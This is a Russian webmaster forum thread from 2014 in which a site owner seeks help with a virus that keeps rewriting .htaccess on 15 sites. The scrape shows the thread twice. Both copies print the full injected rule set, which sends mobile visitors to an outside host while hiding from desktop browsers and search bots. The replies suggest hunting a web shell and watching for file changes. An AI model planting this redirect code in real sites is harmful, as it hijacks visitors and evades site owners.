Помогите победить вирус.

vergiliy80 · 31.07.2014, 17:24

В файле htaccess. вот такая фигня появилась
RewriteEngine on

RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine ) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu900|lg210|lg47|lg920|lg84 0|lg370|sam-r|mg50|s55|g83|t66|vx400|mk99|d615|d763|el370|sl90 0|mp500|samu3|samu4|vx10|xda_|samu5|samu6|samu7|sa mu9|a615|b832|m881|s920|n210|s700|c-810|_h797|mob-x|sk16d|848b|mowser|s580|r800|471x|v120|rim8|c500f oma:|160x|x160|480x|x640|t503|w839|i250|sprint|w39 8samr810|m5252|c7100|mt126|x225|s5330|s820|htil-g1|fly\ v71|s302|-x113|novarra|k610i|-three|8325rc|8352rc|sanyo|vx54|c888|nx250|n120|mtk \ |c5588|s710|t880|c5005|i;458x|p404i|s210|c5100|tel eca|s940|c500|s590|foma|samsu|vx8|vx9|a1000|_mms|m yx|a700|gu1100|bc831|e300|ems100|me701|me702m-three|sd588|s800|8325rc|ac831|mw200|brew\ |d88|htc\/|htc_touch|355x|m50|km100|d736|p-9521|telco|sl74|ktouch|m4u\/|me702|8325rc|kddi|phone|lg\ |sonyericsson|samsung|240x|x320|vx10|nokia|sony\ cmd|motorola|up.browser|up.link|mmp|symbian|smartp hone|midp|wap|vodafone|o2|pocket|mobile|treo) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|631 0|6590|770s|802s|a\ wa|acer|acs-|airn|alav|asus|attw|au-m|aur\ |aus\ |abac|acoo|aiko|alco|alca|amoi|anex|anny|anyw|aptu |arch|argo|bell|bird|bw-n|bw-u|beck|benq|bilb|blac|c55\/|cdm-|chtm|capi|cond|craw|dall|dbte|dc-s|dica|ds-d|ds12|dait|devi|dmob|doco|dopo|el49|erk0|esl8|ez4 0|ez60|ez70|ezos|ezze|elai|emul|eric|ezwa|fake|fly-|fly_|g-mo|g1\ u|g560|gf-5|grun|gene|go\.w|good|grad|hcit|hd-m|hd-p|hd-t|hei-|hp\ i|hpip|hs-c|htc\ |htc-|htca|htcg|htcp|htcs|htct|htc_|haie|hita|huaw|hutc |i-20|i-go|i-ma|i230|iac|iac-|iac\/|ig01|im1k|inno|iris|jata|java|kddi|kgt|kgt\/|kpt\ |kwc-|klon|lexi|lg\ g|lg-a|lg-b|lg-c|lg-d|lg-f|lg-g|lg-k|lg-l|lg-m|lg-o|lg-p|lg-s|lg-t|lg-u|lg-w|lg\/k|lg\/l|lg\/u|lg50|lg54|lge-|lge\/|lynx|leno|m1-w|m3ga|m50\/|maui|mc01|mc21|mcca|medi|meri|mio8|mioa|mo01|mo02 |mode|modo|mot\ |mot-|mt50|mtp1|mtv\ |mate|maxo|merc|mits|mobi|motv|mozz|n100|n101|n102 |n202|n203|n300|n302|n500|n502|n505|n700|n701|n710 |nec-|nem-|newg|neon|netf|noki|nzph|o2\ x|o2-x|opwv|owg1|opti|oran|p800|pand|pg-1|pg-2|pg-3|pg-6|pg-8|pg-c|pg13|phil|pn-2|pt-g|palm|pana|pire|pock|pose|psio|qa-a|qc-2|qc-3|qc-5|qc-7|qc07|qc12|qc21|qc32|qc60|qci-|qwap|qtek|r380|r600|raks|rim9|rove|s55\/|sage|sams|sc01|sch-|scp-|sdk\/|se47|sec-|sec0|sec1|semc|sgh-|shar|sie-|sk-0|sl45|slid|smb3|smt5|sp01|sph-|spv\ |spv-|sy01|samm|sany|sava|scoo|send|siem|smar|smit|soft |sony|t-mo|t218|t250|t600|t610|t618|tcl-|tdg-|telm|tim-|ts70|tsm-|tsm3|tsm5|tx-9|tagt|talk|teli|topl|hiba|up\.b|upg1|utst|v400|v7 50|veri|vk-v|vk40|vk50|vk52|vk53|vm40|vx98|virg|vite|voda|vul c|w3c\ |w3c-|wapj|wapp|wapu|wapm|wig\ |wapi|wapr|wapv|wapy|wapa|waps|wapt|winc|winw|wonu |x700|xda2|xdag|yas-|your|zte-|zeto|acs-|alav|alca|amoi|aste|audi|avan|benq|bird|blac|blaz |brew|brvw|bumb|ccwa|cell|cldc|cmd-|dang|doco|eml2|eric|fetc|hipt|http|ibro|idea|ikom |inno|ipaq|jbro|jemu|java|jigs|kddi|keji|kyoc|kyok |leno|lg-c|lg-d|lg-g|lge-|libw|m-cr|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|mywa|nec-|newt|nok6|noki|o2im|opwv|palm|pana|pant|pdxg|phil |play|pluc|port|prox|qtek|qwap|rozo|sage|sama|sams |sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|treo|tsm-|upg1|upsi|vk-v|voda|vx52|vx53|vx60|vx61|vx70|vx80|vx81|vx83|vx8 5|wap-|wapa|wapi|wapp|wapr|webc|whit|winw|wmlb|xda-) [NC,OR]
RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
RewriteCond %{HTTP:Profile} .+ [NC,OR]
RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]

RewriteCond %{QUERY_STRING} !noredirect [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ $Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91$\ AppleWebKit\/533\.1\ $KHTML,\ like\ Gecko$\ Version\/4\.0\ Mobile\ Safari\/533\.1\ offline)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playsta tion|google|yandex|bot|libwww|msn|america|avant|do wnload|fdm|maui|webmoney|windows-media-player) [NC]

RewriteRule ^(.*)$ http://ploms.net/e/17520?&mod=htaccess&dn=%{HTTP_HOST} [L,R=302]

удаляю через сек 30 опять прописано то же самое, и так у всех 15 сайтов, сменил и отключи все пассы, всё равно , хостер говорит это не их вина, господа кто что посоветует как избавится от этого.

zhegloff · 31.07.2014, 17:27

Цитата:

Сообщение от vergiliy80

удаляю через сек 30 опять прописано то же самое, и так у всех 15 сайтов, сменил и отключи все пассы, всё равно , хостер говорит это не их вина, господа кто что посоветует как избавится от этого.

найти и убить шелл.
не можете сами - идите к докторусайтов.

Клон · 31.07.2014, 17:28

http://forum.sape.ru/showthread.php?t=79363

или

http://www.revisium.com/ai/

MonAmur · 31.07.2014, 17:34

с удовольствием бы полазил на фтп в поисках шелла...

zhegloff · 31.07.2014, 17:47

Цитата:

Сообщение от MonAmur

с удовольствием бы полазил на фтп в поисках шелла...

меньше, чем рута, не бери.

MonAmur · 31.07.2014, 17:56

Цитата:

Сообщение от zhegloff

меньше, чем рута, не бери.

не ну это само собой. чтоб полномочия все были.

Добавлено через 1 минуту
надеюсь, никто не заподозрил меня в злонамерениях? я только в исследовательских целях интересуюсь.

SPQR · 31.07.2014, 21:26

У меня примерно такая же фигня происходит раз в месяц, и тоже хостер открещивается, что у него все в порядке, хотя как можно поломать сайт на статичном html без участия хостера мне не очень понятно.

Выкрутился так, написал прогу, которая анализирует размер и дату всех файлов, если что-то поменялось, мне на почту приходит письмо, интервал запуска - 30 минут.

SergejF · 31.07.2014, 22:09

Цитата:

Сообщение от SPQR

хотя как можно поломать сайт на статичном html без участия хостера

Слямзить с Вашего компа логин и пароль доступа в админку хостера или по фтп, например. В годы распространенного Total Commander'а это было очень популярно. Да и сейчас куча вирусов по этому делу специализируется.

緋色のローブプリンス · 31.07.2014, 22:54

Цитата:

Сообщение от SPQR

как можно поломать сайт на статичном html

можно сломать акаунт пользователя

SPQR · 01.08.2014, 09:54

SergejF,
緋色のローブプリンス,
это все конечно верно, но в логах хостера нет коннектов, кроме как с моего ip , ни в админку, ни на фтп. А в лоб ломать статичный сайт, ну это как головой в стену ...

31.07.2014, 17:24	#1
vergiliy80 Новичок Регистрация: 17.06.2007 Сообщений: 68 Вес репутации: 207	Помогите победить вирус. В файле htaccess. вот такая фигня появилась RewriteEngine on RewriteCond %{HTTP_USER_AGENT} android [NC,OR] RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR] RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR] RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR] RewriteCond %{HTTP_USER_AGENT} (pre\/\|palm\ os\|palm\|hiptop\|avantgo\|plucker\|xiino\|blazer\|elaine ) [NC,OR] RewriteCond %{HTTP_USER_AGENT} (iris\|3g_t\|windows\ ce\|opera\ mobi\|windows\ ce;\ smartphone;\|windows\ ce;\ iemobile) [NC,OR] RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5\|vx1000\|lge\ \|m800\|e860\|u940\|ux840\|compal\|wireless\|\ mobi\|ahong\|lg380\|lgku\|lgu900\|lg210\|lg47\|lg920\|lg84 0\|lg370\|sam-r\|mg50\|s55\|g83\|t66\|vx400\|mk99\|d615\|d763\|el370\|sl90 0\|mp500\|samu3\|samu4\|vx10\|xda_\|samu5\|samu6\|samu7\|sa mu9\|a615\|b832\|m881\|s920\|n210\|s700\|c-810\|_h797\|mob-x\|sk16d\|848b\|mowser\|s580\|r800\|471x\|v120\|rim8\|c500f oma:\|160x\|x160\|480x\|x640\|t503\|w839\|i250\|sprint\|w39 8samr810\|m5252\|c7100\|mt126\|x225\|s5330\|s820\|htil-g1\|fly\ v71\|s302\|-x113\|novarra\|k610i\|-three\|8325rc\|8352rc\|sanyo\|vx54\|c888\|nx250\|n120\|mtk \ \|c5588\|s710\|t880\|c5005\|i;458x\|p404i\|s210\|c5100\|tel eca\|s940\|c500\|s590\|foma\|samsu\|vx8\|vx9\|a1000\|_mms\|m yx\|a700\|gu1100\|bc831\|e300\|ems100\|me701\|me702m-three\|sd588\|s800\|8325rc\|ac831\|mw200\|brew\ \|d88\|htc\/\|htc_touch\|355x\|m50\|km100\|d736\|p-9521\|telco\|sl74\|ktouch\|m4u\/\|me702\|8325rc\|kddi\|phone\|lg\ \|sonyericsson\|samsung\|240x\|x320\|vx10\|nokia\|sony\ cmd\|motorola\|up.browser\|up.link\|mmp\|symbian\|smartp hone\|midp\|wap\|vodafone\|o2\|pocket\|mobile\|treo) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(1207\|3gso\|4thp\|501i\|502i\|503i\|504i\|505i\|506i\|631 0\|6590\|770s\|802s\|a\ wa\|acer\|acs-\|airn\|alav\|asus\|attw\|au-m\|aur\ \|aus\ \|abac\|acoo\|aiko\|alco\|alca\|amoi\|anex\|anny\|anyw\|aptu \|arch\|argo\|bell\|bird\|bw-n\|bw-u\|beck\|benq\|bilb\|blac\|c55\/\|cdm-\|chtm\|capi\|cond\|craw\|dall\|dbte\|dc-s\|dica\|ds-d\|ds12\|dait\|devi\|dmob\|doco\|dopo\|el49\|erk0\|esl8\|ez4 0\|ez60\|ez70\|ezos\|ezze\|elai\|emul\|eric\|ezwa\|fake\|fly-\|fly_\|g-mo\|g1\ u\|g560\|gf-5\|grun\|gene\|go\.w\|good\|grad\|hcit\|hd-m\|hd-p\|hd-t\|hei-\|hp\ i\|hpip\|hs-c\|htc\ \|htc-\|htca\|htcg\|htcp\|htcs\|htct\|htc_\|haie\|hita\|huaw\|hutc \|i-20\|i-go\|i-ma\|i230\|iac\|iac-\|iac\/\|ig01\|im1k\|inno\|iris\|jata\|java\|kddi\|kgt\|kgt\/\|kpt\ \|kwc-\|klon\|lexi\|lg\ g\|lg-a\|lg-b\|lg-c\|lg-d\|lg-f\|lg-g\|lg-k\|lg-l\|lg-m\|lg-o\|lg-p\|lg-s\|lg-t\|lg-u\|lg-w\|lg\/k\|lg\/l\|lg\/u\|lg50\|lg54\|lge-\|lge\/\|lynx\|leno\|m1-w\|m3ga\|m50\/\|maui\|mc01\|mc21\|mcca\|medi\|meri\|mio8\|mioa\|mo01\|mo02 \|mode\|modo\|mot\ \|mot-\|mt50\|mtp1\|mtv\ \|mate\|maxo\|merc\|mits\|mobi\|motv\|mozz\|n100\|n101\|n102 \|n202\|n203\|n300\|n302\|n500\|n502\|n505\|n700\|n701\|n710 \|nec-\|nem-\|newg\|neon\|netf\|noki\|nzph\|o2\ x\|o2-x\|opwv\|owg1\|opti\|oran\|p800\|pand\|pg-1\|pg-2\|pg-3\|pg-6\|pg-8\|pg-c\|pg13\|phil\|pn-2\|pt-g\|palm\|pana\|pire\|pock\|pose\|psio\|qa-a\|qc-2\|qc-3\|qc-5\|qc-7\|qc07\|qc12\|qc21\|qc32\|qc60\|qci-\|qwap\|qtek\|r380\|r600\|raks\|rim9\|rove\|s55\/\|sage\|sams\|sc01\|sch-\|scp-\|sdk\/\|se47\|sec-\|sec0\|sec1\|semc\|sgh-\|shar\|sie-\|sk-0\|sl45\|slid\|smb3\|smt5\|sp01\|sph-\|spv\ \|spv-\|sy01\|samm\|sany\|sava\|scoo\|send\|siem\|smar\|smit\|soft \|sony\|t-mo\|t218\|t250\|t600\|t610\|t618\|tcl-\|tdg-\|telm\|tim-\|ts70\|tsm-\|tsm3\|tsm5\|tx-9\|tagt\|talk\|teli\|topl\|hiba\|up\.b\|upg1\|utst\|v400\|v7 50\|veri\|vk-v\|vk40\|vk50\|vk52\|vk53\|vm40\|vx98\|virg\|vite\|voda\|vul c\|w3c\ \|w3c-\|wapj\|wapp\|wapu\|wapm\|wig\ \|wapi\|wapr\|wapv\|wapy\|wapa\|waps\|wapt\|winc\|winw\|wonu \|x700\|xda2\|xdag\|yas-\|your\|zte-\|zeto\|acs-\|alav\|alca\|amoi\|aste\|audi\|avan\|benq\|bird\|blac\|blaz \|brew\|brvw\|bumb\|ccwa\|cell\|cldc\|cmd-\|dang\|doco\|eml2\|eric\|fetc\|hipt\|http\|ibro\|idea\|ikom \|inno\|ipaq\|jbro\|jemu\|java\|jigs\|kddi\|keji\|kyoc\|kyok \|leno\|lg-c\|lg-d\|lg-g\|lge-\|libw\|m-cr\|maui\|maxo\|midp\|mits\|mmef\|mobi\|mot-\|moto\|mwbp\|mywa\|nec-\|newt\|nok6\|noki\|o2im\|opwv\|palm\|pana\|pant\|pdxg\|phil \|play\|pluc\|port\|prox\|qtek\|qwap\|rozo\|sage\|sama\|sams \|sany\|sch-\|sec-\|send\|seri\|sgh-\|shar\|sie-\|siem\|smal\|smar\|sony\|sph-\|symb\|t-mo\|teli\|tim-\|tosh\|treo\|tsm-\|upg1\|upsi\|vk-v\|voda\|vx52\|vx53\|vx60\|vx61\|vx70\|vx80\|vx81\|vx83\|vx8 5\|wap-\|wapa\|wapi\|wapp\|wapr\|webc\|whit\|winw\|wmlb\|xda-) [NC,OR] RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml\|application\/vnd\.wap\.xhtml\+xml) [NC,OR] RewriteCond %{HTTP:Profile} .+ [NC,OR] RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR] RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR] RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR] RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC] RewriteCond %{QUERY_STRING} !noredirect [NC] RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleWebKit\/533\.1\ \(KHTML,\ like\ Gecko\)\ Version\/4\.0\ Mobile\ Safari\/533\.1\ offline)$ [NC] RewriteCond %{HTTP_USER_AGENT} !(windows\.nt\|bsd\|x11\|unix\|macos\|macintosh\|playsta tion\|google\|yandex\|bot\|libwww\|msn\|america\|avant\|do wnload\|fdm\|maui\|webmoney\|windows-media-player) [NC] RewriteRule ^(.*)$ http://ploms.net/e/17520?&mod=htaccess&dn=%{HTTP_HOST} [L,R=302] удаляю через сек 30 опять прописано то же самое, и так у всех 15 сайтов, сменил и отключи все пассы, всё равно , хостер говорит это не их вина, господа кто что посоветует как избавится от этого. __________________ Cogito ergo sum

31.07.2014, 17:28	#3
Клон Куриллочный троль Регистрация: 15.03.2010 Сообщений: 8,483 Вес репутации: 521	http://forum.sape.ru/showthread.php?t=79363 или http://www.revisium.com/ai/ __________________ 2013 год. В прошлом апокалипсис. Страшный апокалипсис. Гнилой апокалипсис. Просто чмо

31.07.2014, 17:34	#4
MonAmur Эксперт Регистрация: 03.07.2007 Адрес: Chinatown Сообщений: 7,265 Вес репутации: 609	с удовольствием бы полазил на фтп в поисках шелла... __________________ отличная тизерка тексты по 10 руб/кзнак автоматизируй все, не мучайся!

31.07.2014, 21:26	#7
SPQR Мастер Регистрация: 05.10.2011 Адрес: Напротив окна Сообщений: 741 Вес репутации: 185	У меня примерно такая же фигня происходит раз в месяц, и тоже хостер открещивается, что у него все в порядке, хотя как можно поломать сайт на статичном html без участия хостера мне не очень понятно. Выкрутился так, написал прогу, которая анализирует размер и дату всех файлов, если что-то поменялось, мне на почту приходит письмо, интервал запуска - 30 минут. __________________ Si vis pacem, para bellum

01.08.2014, 09:54	#10
SPQR Мастер Регистрация: 05.10.2011 Адрес: Напротив окна Сообщений: 741 Вес репутации: 185	SergejF, 緋色のローブプリンス, это все конечно верно, но в логах хостера нет коннектов, кроме как с моего ip , ни в админку, ни на фтп. А в лоб ломать статичный сайт, ну это как головой в стену ... __________________ Si vis pacem, para bellum

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
разводят на 60 у.е., вирус, помогите	Wilson	Курилка	29	20.08.2011 01:49
Помогите победить компьютер	noggano77777	Курилка	82	04.11.2010 17:55
Помогите победить google	gun	Курилка	8	23.12.2009 17:30
Помогите, вирус!	bla-bla-bla	Курилка	36	13.09.2009 21:43